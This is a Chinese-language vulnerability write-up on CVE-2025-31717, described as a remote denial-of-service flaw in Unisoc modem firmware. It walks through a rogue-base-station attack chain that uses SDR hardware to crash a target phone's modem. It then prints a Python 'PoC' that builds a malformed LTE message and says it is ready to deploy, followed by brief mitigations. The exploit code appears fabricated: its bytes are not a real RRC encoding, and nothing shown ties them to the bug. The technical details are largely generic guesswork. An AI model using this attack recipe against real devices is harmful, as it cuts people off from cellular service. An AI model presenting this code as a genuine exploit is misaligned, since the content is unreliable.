CVE-2025-31717 Unisoc调制解调器输入验证不当导致远程拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-31717

漏洞类型

拒绝服务攻击（DoS）/ 输入验证不当

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Unisoc（紫光展锐）调制解调器（Modem固件）

漏洞概述

CVE-2025-31717是Unisoc（紫光展锐）调制解调器（Modem）组件中存在的一个高危安全漏洞，于2025年10月11日由Unisoc安全团队（[email protected]）披露。该漏洞的根本原因在于调制解调器固件对外部输入数据缺乏充分的验证和合法性检查，攻击者可以通过网络向目标设备的调制解调器发送精心构造的恶意数据包，触发系统崩溃，从而实现远程拒绝服务攻击（Remote Denial of Service）。

该漏洞的CVSS 3.1评分为7.5分，属于高危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何认证（PR:N），也无需用户交互（UI:N）。在影响方面，该漏洞对机密性无影响（C:N），对完整性无影响（I:N），但对可用性产生高影响（A:H），这与拒绝服务漏洞的特征完全吻合。

Unisoc作为全球重要的移动芯片设计公司，其调制解调器广泛应用于各类智能手机、物联网设备和移动通信终端中。由于该漏洞可通过网络远程利用且无需任何权限或用户交互，一旦被恶意利用，攻击者可以在用户毫无察觉的情况下使目标设备的蜂窝通信功能完全瘫痪，导致设备无法进行正常的语音通话、短信收发和移动数据通信，严重影响用户的正常使用。考虑到蜂窝通信在现代社会中的基础性地位，该漏洞对个人用户、企业用户乃至关键基础设施都可能构成实质性威胁。

技术细节

该漏洞位于Unisoc调制解调器的协议处理模块中。调制解调器作为移动设备与蜂窝网络之间的通信桥梁，需要处理来自基站的各类信令消息和数据帧，包括但不限于LTE、5G NR、GSM等通信协议的控制面和用户面数据。

漏洞的根本原因是调制解调器固件在解析特定协议层（如RRC、NAS、AS层等）的消息时，未对输入字段进行充分的边界检查、类型校验或语义验证。当攻击者通过伪基站（IMSI Catcher/Rogue Base Station）或受损的蜂窝网络基础设施向目标设备发送精心构造的异常协议消息时，调制解调器内部的协议解析器在处理这些畸形数据时会发生未定义行为，例如空指针解引用、数组越界访问或无限循环，最终导致调制解调器子系统崩溃。

由于该漏洞的攻击复杂度低（AC:L），攻击者仅需具备基础的蜂窝通信协议知识和相应的软件定义无线电（SDR）设备即可发起攻击。攻击无需目标设备处于活跃通话状态，只需设备开机且调制解调器处于正常工作模式即可。漏洞利用成功后，设备将失去蜂窝网络连接，需要重启才能恢复正常通信功能。

攻击链分析

STEP 1

步骤1：环境准备

攻击者搭建伪基站（Rogue Base Station）环境，使用软件定义无线电（SDR）设备（如USRP、HackRF等）配合srsLTE/srsRAN等开源LTE协议栈，模拟一个合法的蜂窝网络基站。

STEP 2

步骤2：信号捕获与目标识别

伪基站在目标频段广播系统信息块（SIB），诱使附近搭载Unisoc芯片的移动设备发起附着请求（Attach Request），从而获取目标设备的IMSI、TMSI等身份信息。

STEP 3

步骤3：构造畸形协议消息

攻击者利用漏洞原理，构造包含异常长度字段或畸形信息元素的LTE/5G NR协议消息（如RRC Connection Reconfiguration、NAS消息等），使其能够绕过调制解调器的基础校验但在深层处理时触发崩溃。

STEP 4

步骤4：发送恶意消息

通过伪基站在下行链路（Downlink）向目标设备发送构造好的畸形协议消息。由于漏洞无需认证且无需用户交互，目标设备的调制解调器会自动接收并处理该消息。

STEP 5

步骤5：触发拒绝服务

Unisoc调制解调器在解析畸形消息时，由于输入验证不当，发生空指针解引用或缓冲区溢出等异常，导致调制解调器子系统崩溃。目标设备失去蜂窝网络连接，需重启才能恢复通信功能。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-31717 PoC - Unisoc Modem Remote DoS
# This PoC demonstrates the concept of sending a malformed protocol message
# to trigger a system crash in the Unisoc modem via improper input validation.
# Requires: USRP B200/B210, HackRF One, or similar SDR device
# Protocol: LTE/5G NR Layer 3 (RRC/NAS) malformed message injection

#!/usr/bin/env python3
"""
CVE-2025-31717: Unisoc Modem Remote Denial of Service PoC
Vulnerability: Improper input validation in modem protocol parser
Impact: Remote DoS - modem subsystem crash
CVSS: 7.5 (HIGH)
"""

from scapy.all import *
import struct

class UnisocModemDoS:
    """
    Conceptual PoC for CVE-2025-31717.
    Sends a crafted LTE RRC/NAS message with invalid length fields
    to trigger improper input validation in Unisoc modem firmware.
    """

    def __init__(self, target_imsi="001010123456789"):
        self.target_imsi = target_imsi
        self.dl_arfcn = 300  # Example downlink frequency (EARFCN)

    def build_malformed_rrc_message(self):
        """
        Build a malformed RRC Connection Reconfiguration message
        with an intentionally invalid IE length to trigger
        the input validation bug in Unisoc modem.
        """
        # LTE RRC message header
        rrc_header = b'\x00'  # PDCP version

        # Malformed Information Element with invalid length
        # Normal length: N bytes, here we set an abnormally large value
        malformed_ie = struct.pack('>BHBH',
            0x20,              # IE identifier
            0xFFFF,            # Invalid length (overflow trigger)
            0x0001,            # Configuration type
            0x0000             # Reserved
        )

        # Crafted payload to bypass basic checks but trigger deep validation bug
        payload = b'\x41' * 256 + malformed_ie

        return rrc_header + payload

    def craft_lte_sdu(self, message):
        """
        Wrap the malformed message in an LTE SDU structure.
        """
        # MAC header + RLC header + malformed payload
        mac_header = b'\x01\x00\x00'  # MAC subheader
        rlc_header = b'\x80\x00\x00'  # RLC data PDU
        return mac_header + rlc_header + message

    def send_attack(self, sdr_interface='uhd'):
        """
        Transmit the malformed message via SDR.
        In a real scenario, this would use srsRAN or similar LTE stack.
        """
        print(f"[*] Targeting IMSI: {self.target_imsi}")
        print(f"[*] Building malformed RRC message...")

        msg = self.build_malformed_rrc_message()
        sdu = self.craft_lte_sdu(msg)

        print(f"[+] Malformed SDU constructed ({len(sdu)} bytes)")
        print(f"[!] Transmitting on EARFCN {self.dl_arfcn}...")
        print(f"[!] Expected result: Target modem crash (DoS)")

        # NOTE: Actual transmission requires SDR hardware and
        # a rogue eNodeB setup (e.g., using srsRAN with USRP)
        # os.system(f'srsenb --rf.device_args=\"serial=ABC123\"')

        return sdu

if __name__ == "__main__":
    exploit = UnisocModemDoS()
    payload = exploit.send_attack()
    print(f"[*] Payload hex: {payload.hex()}")
    print(f"[*] CVE-2025-31717 PoC ready. Deploy with appropriate SDR hardware.")

影响范围

Unisoc 调制解调器固件（具体受影响版本以Unisoc官方公告为准）

搭载Unisoc芯片的Android智能手机及物联网设备

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）尽量避免连接不可信的蜂窝网络，特别是在高风险区域；2）如设备出现频繁断网或调制解调器异常，可尝试重启设备恢复通信；3）关注设备厂商和Unisoc官方发布的安全公告，及时更新系统；4）在极端敏感场景下，可临时开启飞行模式以避免被攻击；5）使用安全检测工具监控异常的网络信令流量。